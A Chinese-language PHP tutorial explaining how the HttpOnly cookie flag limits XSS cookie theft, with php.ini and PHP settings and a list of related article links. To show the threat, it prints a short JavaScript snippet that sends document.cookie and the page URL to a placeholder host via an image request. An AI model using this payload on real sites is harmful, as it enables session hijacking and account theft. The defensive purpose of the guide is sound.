xss防御之php利用httponly防xss攻擊
xss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網(wǎng)站出現(xiàn)xss漏洞,就可以執(zhí)行任意的js代碼,最可怕的是攻擊者利用js獲取cookie或者session劫持,如果這里面包含了大量敏感信息(身份信息,管理員信息)等,那完了。。。
如下js獲取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是從document對象中獲取的,現(xiàn)在瀏覽器在設(shè)置Cookie的時(shí)候一般都接受一個(gè)叫做HttpOnly的參數(shù),跟domain等其他參數(shù)一樣,一旦這個(gè)HttpOnly被設(shè)置,你在瀏覽器的document對象中就看不到Cookie了。
PHP設(shè)置HttpOnly:
//在php.ini中,session.cookie_httponly = ture 來開啟全局的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七個(gè)參數(shù)設(shè)置為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
對于PHP5.1以前版本的PHP通過:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是萬能的!
- PHP和XSS跨站攻擊的防范
- 解析PHP跨站刷票的實(shí)現(xiàn)代碼
- php安全開發(fā) 添加隨機(jī)字符串驗(yàn)證,防止偽造跨站請求
- php跨站攻擊實(shí)例分析
- ThinkPHP2.x防范XSS跨站攻擊的方法
- PHP實(shí)現(xiàn)表單提交數(shù)據(jù)的驗(yàn)證處理功能【防SQL注入和XSS攻擊等】
- 整理php防注入和XSS攻擊通用過濾
- php過濾XSS攻擊的函數(shù)
- 細(xì)談php中SQL注入攻擊與XSS攻擊
- PHP中防止SQL注入攻擊和XSS攻擊的兩個(gè)簡單方法
- PHP實(shí)現(xiàn)的防止跨站和xss攻擊代碼【來自阿里云】
相關(guān)文章
session 加入redis的實(shí)現(xiàn)代碼
本篇文章主要介紹了session 加入redis 的實(shí)例,對session 進(jìn)行了詳細(xì)介紹,并提供了代碼實(shí)例,需要的朋友可以參考下2016-07-07php中文驗(yàn)證碼實(shí)現(xiàn)示例分享
這篇文章主要介紹了使用php實(shí)現(xiàn)中文驗(yàn)證碼,代碼簡單,大家可以直接使用2014-01-01THINKPHP截取中文字符串函數(shù)實(shí)例代碼
在項(xiàng)目開發(fā)中,我們常常會遇到英文、中文等字符串截取問題,比如說新聞列表頁面需要新聞內(nèi)容簡介,這就要用到字符串截取了。2017-03-03